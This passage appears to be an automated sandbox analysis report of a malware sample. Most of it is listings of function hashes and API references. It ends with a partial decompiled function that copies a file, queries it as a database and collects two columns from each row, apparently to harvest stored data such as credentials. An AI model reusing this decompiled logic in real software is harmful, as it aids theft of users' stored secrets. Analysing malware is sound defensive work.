                                                                                                                                                                        • __errno.LIBCMTD ref: 004245BF
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.456441129.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_412000_F0geI.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __errno$__invoke_watson_if_error$_wcscpy_s
                                                                                                                                                                        • String ID: QP#$`r@$`r@$n#@$n#@$n#@$n#@$n#@
                                                                                                                                                                        • API String ID: 1109857904-2602734993
                                                                                                                                                                        • Opcode ID: 2e6820e7d1c99436e4f461e7e9f65a6fbf290e7f012889dab3cd65e7e718bbde
                                                                                                                                                                        • Instruction ID: c8e87d1946ddb67400bc3ecb9fd161beea858cd9bcaf812c77095ccde34d7992
                                                                                                                                                                        • Opcode Fuzzy Hash: 2e6820e7d1c99436e4f461e7e9f65a6fbf290e7f012889dab3cd65e7e718bbde
                                                                                                                                                                        • Instruction Fuzzy Hash: D6917274E44218ABDB24DF50DC45BEE73B4AB85704F1084AAF609662C1D7BC9ED0CF99
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.456441129.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_412000_F0geI.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __inc$__hextodec__un_inc_isxdigit
                                                                                                                                                                        • String ID: 8$F
                                                                                                                                                                        • API String ID: 3652663768-3144575033
                                                                                                                                                                        • Opcode ID: 44975e82e32c5666a07394cae5dd75be6fc01165a8bdc5575b6d52771f1f6d81
                                                                                                                                                                        • Instruction ID: cbc3e990046101d15e9f01f9175547261931542e588062fa9cf526bccf962501
                                                                                                                                                                        • Opcode Fuzzy Hash: 44975e82e32c5666a07394cae5dd75be6fc01165a8bdc5575b6d52771f1f6d81
                                                                                                                                                                        • Instruction Fuzzy Hash: C8028FB0E052698BCF24CF65E8943EEBBB1AF55308F5481DAD81967303D2799E81CF49
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.456441129.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_412000_F0geI.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem_wctomb_s_write_string
                                                                                                                                                                        • String ID: -$9
                                                                                                                                                                        • API String ID: 3451365851-1631151375
                                                                                                                                                                        • Opcode ID: cb27d96736e196417b3c79b30a33bffabc01b3be02829a97fd44d4dcadda5e2e
                                                                                                                                                                        • Instruction ID: 6fbb936e6e21048b28befd4e543fd591277d1b1e0142e501cd9668f9e3d1ea79
                                                                                                                                                                        • Opcode Fuzzy Hash: cb27d96736e196417b3c79b30a33bffabc01b3be02829a97fd44d4dcadda5e2e
                                                                                                                                                                        • Instruction Fuzzy Hash: 14F14A71D052299FDB24CF58DC99BAEB7B1BB48304F1482EAE409A7241D7389E84CF59
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.456441129.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_412000_F0geI.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem__mbtowc_l_write_string
                                                                                                                                                                        • String ID: 9
                                                                                                                                                                        • API String ID: 3455034128-2366072709
                                                                                                                                                                        • Opcode ID: b16d0459f862c8420226f9aca193c90cfa6dc0c538bc7cc83c81076bc6952c3b
                                                                                                                                                                        • Instruction ID: 2c41f508bb318b1f8b5bc08ec9acbbca8298e5514b934a7e44ca097c7124a9b6
                                                                                                                                                                        • Opcode Fuzzy Hash: b16d0459f862c8420226f9aca193c90cfa6dc0c538bc7cc83c81076bc6952c3b
                                                                                                                                                                        • Instruction Fuzzy Hash: 06F159B1E002299FDB24CF58CC81BAEB7B5FF88314F14519AE509AB251D7389E84CF59
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __invoke_watson_if_oneof.LIBCMTD ref: 004247CE
                                                                                                                                                                        • __errno.LIBCMTD ref: 004247C6
                                                                                                                                                                          • Part of subcall function 00419D50: __getptd_noexit.LIBCMTD ref: 00419D56
                                                                                                                                                                        • __errno.LIBCMTD ref: 004247D6
                                                                                                                                                                        • _wcscpy_s.LIBCMTD ref: 00424810
                                                                                                                                                                        • __invoke_watson_if_error.LIBCMTD ref: 00424819
                                                                                                                                                                        • ___crtMessageBoxW.LIBCMTD ref: 00424832
                                                                                                                                                                        • _raise.LIBCMTD ref: 0042484B
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.456441129.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_412000_F0geI.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __errno$Message___crt__getptd_noexit__invoke_watson_if_error__invoke_watson_if_oneof_raise_wcscpy_s
                                                                                                                                                                        • String ID: QP#$`r@$n#@$n#@$n#@$n#@$n#@$n#@
                                                                                                                                                                        • API String ID: 1308758192-46180747
                                                                                                                                                                        • Opcode ID: 2461502eb715ff7599928029a8ade488d316d128b4b8fd269882071301a35061
                                                                                                                                                                        • Instruction ID: b7fc949670298f43cf3bc8be79e7bc6415f0d6b645119a4239e0c2d5dbdbef19
                                                                                                                                                                        • Opcode Fuzzy Hash: 2461502eb715ff7599928029a8ade488d316d128b4b8fd269882071301a35061
                                                                                                                                                                        • Instruction Fuzzy Hash: 65415474E44228ABDB24DB91DC46FDA7374AB88704F1040EAF219772C1D6B86EC0CF59
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.456441129.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_412000_F0geI.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Locale_write_multi_char$UpdateUpdate::~___errno__get_printf_count_output_get_int_arg_wctomb_s_write_string
                                                                                                                                                                        • String ID: -
                                                                                                                                                                        • API String ID: 577823877-2547889144
                                                                                                                                                                        • Opcode ID: 652433eaeae366e57fac5596ad03d7ff55dff337ab454d0776fc57a10d137009
                                                                                                                                                                        • Instruction ID: c1e4325090ae09e2a12d4ba6091b322c4b4b1f9f650ebbe9855a593ce12e5e41
                                                                                                                                                                        • Opcode Fuzzy Hash: 652433eaeae366e57fac5596ad03d7ff55dff337ab454d0776fc57a10d137009
                                                                                                                                                                        • Instruction Fuzzy Hash: 5AA1A070E012289BEB20DF55CC59BEEB7B0AB48304F5042EAE4197A291D7789EC4CF59
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0040A69E: LocalFree.KERNEL32(00000000,?,?,0040B2D2), ref: 0040A701
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00406BA0
                                                                                                                                                                        • wsprintfW.USER32 ref: 00406C85
                                                                                                                                                                        • lstrlenW.KERNEL32 ref: 00406C92
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00406CAF
                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00406CE9
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00406CF4
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00406CFF
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00406D0B
                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00406D12
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00406D19
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLocal$DeleteFile$lstrlenwsprintf
                                                                                                                                                                        • String ID: FALSE$TRUE
                                                                                                                                                                        • API String ID: 4168217763-1412513891
                                                                                                                                                                        • Opcode ID: 9678f90ab55edb758f128c11257a790f7dcdeab56316ac4198c1d38be139e42a
                                                                                                                                                                        • Instruction ID: c49cda921923e69c5166418a1bf50fcb18860fb3db535930a4ec2c5e5cba73ac
                                                                                                                                                                        • Opcode Fuzzy Hash: 9678f90ab55edb758f128c11257a790f7dcdeab56316ac4198c1d38be139e42a
                                                                                                                                                                        • Instruction Fuzzy Hash: 25619571A00214AFDF049FA1EE44EAE7BB5EF48310F108439F916B72A1DB759D20DB59
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.456441129.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_412000_F0geI.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Locale__inc$UpdateUpdate::~___mbtowc_l__un_inc_memset
                                                                                                                                                                        • String ID: $]${${
                                                                                                                                                                        • API String ID: 2643002128-1336171634
                                                                                                                                                                        • Opcode ID: 38d49781c0c57a9cad80453b4e34d42b7e599b07b36b725049bdf04ed0c535c3
                                                                                                                                                                        • Instruction ID: 7b836b868101b2461060d44305344fa49ed9a12a9ed4976e40d4580e4bd384a3
                                                                                                                                                                        • Opcode Fuzzy Hash: 38d49781c0c57a9cad80453b4e34d42b7e599b07b36b725049bdf04ed0c535c3
                                                                                                                                                                        • Instruction Fuzzy Hash: 4AB1E870E053A89FCF25DBA9D4906EDFBB1AF55304F14819BE4AA6B343C2385A40CF55
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __getptd.LIBCMTD ref: 00418CB5
                                                                                                                                                                          • Part of subcall function 0041BCB0: __getptd_noexit.LIBCMTD ref: 0041BCB6
                                                                                                                                                                          • Part of subcall function 0041BCB0: __amsg_exit.LIBCMTD ref: 0041BCC6
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.456441129.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_412000_F0geI.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __amsg_exit__getptd__getptd_noexit
                                                                                                                                                                        • String ID: n#@
                                                                                                                                                                        • API String ID: 3939802461-1971128777
                                                                                                                                                                        • Opcode ID: 3d0b54772145becba0183ab7bb485930756f4df450446d99cda099476f9c4312
                                                                                                                                                                        • Instruction ID: a2e9a52059b654bc5406d46ef845d4db42a5e7a7c43eaf5afe2c9885acfdba67
                                                                                                                                                                        • Opcode Fuzzy Hash: 3d0b54772145becba0183ab7bb485930756f4df450446d99cda099476f9c4312
                                                                                                                                                                        • Instruction Fuzzy Hash: 3B819FB5A00209ABDF00DF64DC55FEF77B5AF48304F14845EF908A7281D7789A94CBA9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.456441129.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_412000_F0geI.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __errno$Message___crt__invoke_watson_if_error__invoke_watson_if_oneof__snwprintf_s_raise_wcscpy_s
                                                                                                                                                                        • String ID: T)@$T)@
                                                                                                                                                                        • API String ID: 1843076477-1155104275
                                                                                                                                                                        • Opcode ID: 8929b1f4c9a2aff0a83edb7ae425d7f7bcf08ae553ec47a9f2a36e2b4f1be40b
                                                                                                                                                                        • Instruction ID: c7a4a860db40221b124d43e5a44df49b08fb112f7b311a157247053f3d49ee4d
                                                                                                                                                                        • Opcode Fuzzy Hash: 8929b1f4c9a2aff0a83edb7ae425d7f7bcf08ae553ec47a9f2a36e2b4f1be40b
                                                                                                                                                                        • Instruction Fuzzy Hash: 43417870A40214BBDB24EB90DD4AFDA7374AB48704F0045EAB108B72D1D6FD5AD5CF59
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.456441129.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_412000_F0geI.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __errno$Message___crt__invoke_watson_if_error__invoke_watson_if_oneof__snwprintf_s_raise_wcscpy_s
                                                                                                                                                                        • String ID: T)@$T)@
                                                                                                                                                                        • API String ID: 1843076477-1155104275
                                                                                                                                                                        • Opcode ID: 9fdacd669fdcdafbe7e014797b45e44567de6dd3f312136f34c8ba13df4fe3ba
                                                                                                                                                                        • Instruction ID: 6009be71583d5b4970b192074538a43939151051f19ea94d5b900f3dd88f6011
                                                                                                                                                                        • Opcode Fuzzy Hash: 9fdacd669fdcdafbe7e014797b45e44567de6dd3f312136f34c8ba13df4fe3ba
                                                                                                                                                                        • Instruction Fuzzy Hash: CB417570A40228BBDB24EB90DD49BDA7374AB48704F0045AAB508B72C1D7F95AD5CF59
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.456441129.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_412000_F0geI.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Locale_write_multi_char$UpdateUpdate::~___errno__get_printf_count_output__mbtowc_l_get_int_arg_write_string
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 703810477-0
                                                                                                                                                                        • Opcode ID: 83aee01e5547a70ed7e6d9285c6afc650e3112415a577fb90558f1cd27df42b6
                                                                                                                                                                        • Instruction ID: 09345f63ed7e6f9298223f806110a78fac50aadeae85ae894961fc24b627c898
                                                                                                                                                                        • Opcode Fuzzy Hash: 83aee01e5547a70ed7e6d9285c6afc650e3112415a577fb90558f1cd27df42b6
                                                                                                                                                                        • Instruction Fuzzy Hash: D6A17FF0E002189BDB24DF45CC95BEEB3B4AB48304F14519AE6197B292D7789E84CF5D
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.456441129.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_412000_F0geI.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _write_multi_char$_get_int_arg_wctomb_s_write_string
                                                                                                                                                                        • String ID: -
                                                                                                                                                                        • API String ID: 557302112-2547889144
                                                                                                                                                                        • Opcode ID: ce3baeaae392aa5525ae5ae748688f599395809c67ab856bd2b4938cabbf0e09
                                                                                                                                                                        • Instruction ID: 97e9e53a55d9c7f2f9b9026c06879c4fc2e96d3f854523c43620616b097d2291
                                                                                                                                                                        • Opcode Fuzzy Hash: ce3baeaae392aa5525ae5ae748688f599395809c67ab856bd2b4938cabbf0e09
                                                                                                                                                                        • Instruction Fuzzy Hash: A7A18F70D012289FDF64CF54CC99BEEB7B1AB48304F5482EAE4096B291D7789E84CF59
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • _cmpDWORD.LIBCMTD ref: 00428CBE
                                                                                                                                                                          • Part of subcall function 00428F40: _cmpBYTE.LIBCMTD ref: 00428F78
                                                                                                                                                                        • _cmpDWORD.LIBCMTD ref: 00428CE5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.456441129.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_412000_F0geI.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _cmp
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2028851527-0
                                                                                                                                                                        • Opcode ID: c8f3e292c3b1e8bb93b3af797200ed8ae75d1eaad313a1fa08ee5c27a5052a11
                                                                                                                                                                        • Instruction ID: c519f4dcc2cb22526c2c3f65a94b32e6156838b2b49557c5b1d95bf76d6f3455
                                                                                                                                                                        • Opcode Fuzzy Hash: c8f3e292c3b1e8bb93b3af797200ed8ae75d1eaad313a1fa08ee5c27a5052a11
                                                                                                                                                                        • Instruction Fuzzy Hash: 18513271A02118EFCB04DFBCEA48A9DBBB5AB40305F91855DE409AB249DB349F44DB54
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.456441129.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_412000_F0geI.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __inc$__mbtowc_l__un_inc
                                                                                                                                                                        • String ID: $c
                                                                                                                                                                        • API String ID: 579247601-3797896886
                                                                                                                                                                        • Opcode ID: 27eaf5ec369bf2605294908d3608e0bb67ffb8760d3954b98b07801aa536f58c
                                                                                                                                                                        • Instruction ID: b9e472e2ce2df36fac2c0f239223ba567e220fd7a13c671cc3a2029d4395fcb2
                                                                                                                                                                        • Opcode Fuzzy Hash: 27eaf5ec369bf2605294908d3608e0bb67ffb8760d3954b98b07801aa536f58c
                                                                                                                                                                        • Instruction Fuzzy Hash: 8091C1B0E04268DBCF24CB95E8946EEB7B1AF55304F54819BD85A6B313C2389E80CF49
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.456441129.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_412000_F0geI.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _write_multi_char$__mbtowc_l_get_int_arg_write_string
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4186970751-0
                                                                                                                                                                        • Opcode ID: a0cf7bf72d40c6b3fcfa4398c383bd4095b36ac00e10a8f1071b07447650425d
                                                                                                                                                                        • Instruction ID: 59376063915a0a8db93da85e9deece7cf929ebc1784357db36357fb5499e79b7
                                                                                                                                                                        • Opcode Fuzzy Hash: a0cf7bf72d40c6b3fcfa4398c383bd4095b36ac00e10a8f1071b07447650425d
                                                                                                                                                                        • Instruction Fuzzy Hash: 5FA17DF1E002189BDB24CF55CC91BEEB3B5AF48304F14919AE6096B292D7389E84CF59
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • _cmpDWORD.LIBCMTD ref: 00428A66
                                                                                                                                                                          • Part of subcall function 00428F40: _cmpBYTE.LIBCMTD ref: 00428F78
                                                                                                                                                                        • _cmpDWORD.LIBCMTD ref: 00428A8D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.456441129.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_412000_F0geI.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _cmp
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2028851527-0
                                                                                                                                                                        • Opcode ID: 000ccbe2cadb759e74cd5e7df1b3dfedffdf27a34ef9d4f6f82d792d1a5bf3d5
                                                                                                                                                                        • Instruction ID: 789ec6b790b3460523aa97c3653b34ec8f1834b2997240226c4a151201fd5581
                                                                                                                                                                        • Opcode Fuzzy Hash: 000ccbe2cadb759e74cd5e7df1b3dfedffdf27a34ef9d4f6f82d792d1a5bf3d5
                                                                                                                                                                        • Instruction Fuzzy Hash: 6B315471A02118EFCB04EFBCEA48AAD7B75AB40305F91815EF409AB245DE38AF41DB55
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.456441129.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_412000_F0geI.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __errno$_memset$__getptd_noexit
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4262221207-0
                                                                                                                                                                        • Opcode ID: c3de8bdb0bd3d2021b5b8e9d24e112d6a6bb03619bd3f07dca8100efc64d381b
                                                                                                                                                                        • Instruction ID: ea409ff7ec6aca4b4ad4ab9628627815d2f39d53bb3e6b11bd0a1de42637db43
                                                                                                                                                                        • Opcode Fuzzy Hash: c3de8bdb0bd3d2021b5b8e9d24e112d6a6bb03619bd3f07dca8100efc64d381b
                                                                                                                                                                        • Instruction Fuzzy Hash: B4617C70A00219EFCF14CF58D945AAE33B1EF84328F60821AE8296B3D5D7399D41CF99
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 19%
                                                                                                                                                                        			E00407213(intOrPtr* __ecx, intOrPtr _a4, void* _a8) {
                                                                                                                                                                        				char _v8;
                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                        				void* _t24;
                                                                                                                                                                        				void* _t25;
                                                                                                                                                                        				void* _t27;
                                                                                                                                                                        				intOrPtr* _t32;
                                                                                                                                                                        				intOrPtr* _t39;
                                                                                                                                                                        				void* _t40;
                                                                                                                                                                        				intOrPtr* _t41;
                                                                                                                                                                        				intOrPtr* _t43;
                                                                                                                                                                        				intOrPtr _t44;
                                                                                                                                                                        				intOrPtr _t45;
                                                                                                                                                                        				intOrPtr _t47;
                                                                                                                                                                        				intOrPtr _t48;
                                                                                                                                                                        				intOrPtr _t51;
                                                                                                                                                                        				intOrPtr _t52;
                                                                                                                                                                        				intOrPtr* _t59;
                                                                                                                                                                        				intOrPtr* _t69;
                                                                                                                                                                        				intOrPtr _t82;
                                                                                                                                                                        				intOrPtr _t84;
                                                                                                                                                                        				intOrPtr _t85;
                                                                                                                                                                        				void* _t87;
                                                                                                                                                                        				void* _t89;
                                                                                                                                                                        				void* _t90;
                                                                                                                                                                        				void* _t91;
                                                                                                                                                                        
                                                                                                                                                                        				_t59 = __ecx;
                                                                                                                                                                        				if(_a8 == 0) {
                                                                                                                                                                        					L18:
                                                                                                                                                                        					return 0;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t24 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        				_t25 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        				_a8 = _t25;
                                                                                                                                                                        				_t87 =  *((intOrPtr*)( *0x40e000))(_t24, _a4,  *0x40e284);
                                                                                                                                                                        				_t27 = E0040A69E( *0x40e000,  &_a8);
                                                                                                                                                                        				_t89 = _a8;
                                                                                                                                                                        				if(_t27 == 0) {
                                                                                                                                                                        					L16:
                                                                                                                                                                        					LocalFree(_t87);
                                                                                                                                                                        					L17:
                                                                                                                                                                        					DeleteFileW(_t89);
                                                                                                                                                                        					LocalFree(_t89);
                                                                                                                                                                        					goto L18;
                                                                                                                                                                        				}
                                                                                                                                                                        				_push(0);
                                                                                                                                                                        				_push(_t89);
                                                                                                                                                                        				_push(_t87);
                                                                                                                                                                        				if( *((intOrPtr*)( *0x40e184))() == 0) {
                                                                                                                                                                        					goto L16;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t32 =  *0x40e488; // 0x6dd8da30
                                                                                                                                                                        				_push( &_v8);
                                                                                                                                                                        				_push(_t89);
                                                                                                                                                                        				if( *_t32() != 0) {
                                                                                                                                                                        					L11:
                                                                                                                                                                        					DeleteFileW(_t89);
                                                                                                                                                                        					if(_t89 != 0) {
                                                                                                                                                                        						LocalFree(_t89);
                                                                                                                                                                        					}
                                                                                                                                                                        					if(_t87 != 0) {
                                                                                                                                                                        						LocalFree(_t87);
                                                                                                                                                                        					}
                                                                                                                                                                        					return 1;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t39 =  *0x40e494; // 0x6dcab910
                                                                                                                                                                        				_t40 =  *_t39(_v8,  *0x40e238, 0xffffffff,  &_a8, 0);
                                                                                                                                                                        				_t91 = _t90 + 0x14;
                                                                                                                                                                        				if(_t40 == 0) {
                                                                                                                                                                        					while(1) {
                                                                                                                                                                        						_push(_a8);
                                                                                                                                                                        						_t41 =  *0x40e48c; // 0x6dc38060
                                                                                                                                                                        						if( *_t41() != 0x64) {
                                                                                                                                                                        							break;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t43 = E0040E4B4; // 0x6dc324b0
                                                                                                                                                                        						_t44 =  *_t43(_a8, 0);
                                                                                                                                                                        						_t69 = E0040E4B4; // 0x6dc324b0
                                                                                                                                                                        						_v12 = _t44;
                                                                                                                                                                        						_t45 =  *_t69(_a8, 1);
                                                                                                                                                                        						_t91 = _t91 + 0x10;
                                                                                                                                                                        						_v16 = _t45;
                                                                                                                                                                        						_push(_v12);
                                                                                                                                                                        						if( *((intOrPtr*)( *0x40e08c))() > 1) {
                                                                                                                                                                        							_t47 = E0040A503( *_t59, _v12);
                                                                                                                                                                        							_t82 =  *0x40e228; // 0x6d5b98
                                                                                                                                                                        							 *_t59 = _t47;
                                                                                                                                                                        							_t48 = E0040A503(_t47, _t82);
                                                                                                                                                                        							_push(_v16);
                                                                                                                                                                        							 *_t59 = _t48;
                                                                                                                                                                        							if( *((intOrPtr*)( *0x40e08c))() > 1) {
                                                                                                                                                                        								_t51 = E0040A503( *_t59, _v16);
                                                                                                                                                                        								_t84 =  *0x40e228; // 0x6d5b98
                                                                                                                                                                        								 *_t59 = _t51;
                                                                                                                                                                        								_t52 = E0040A503(_t51, _t84);
                                                                                                                                                                        								_t85 =  *0x40e228; // 0x6d5b98
                                                                                                                                                                        								 *_t59 = _t52;
                                                                                                                                                                        								 *_t59 = E0040A503(_t52, _t85);
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        					 *0x40e4b0(_a8);
                                                                                                                                                                        					 *0x40e4a4(_v8);
                                                                                                                                                                        					goto L11;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					LocalFree(_t87);
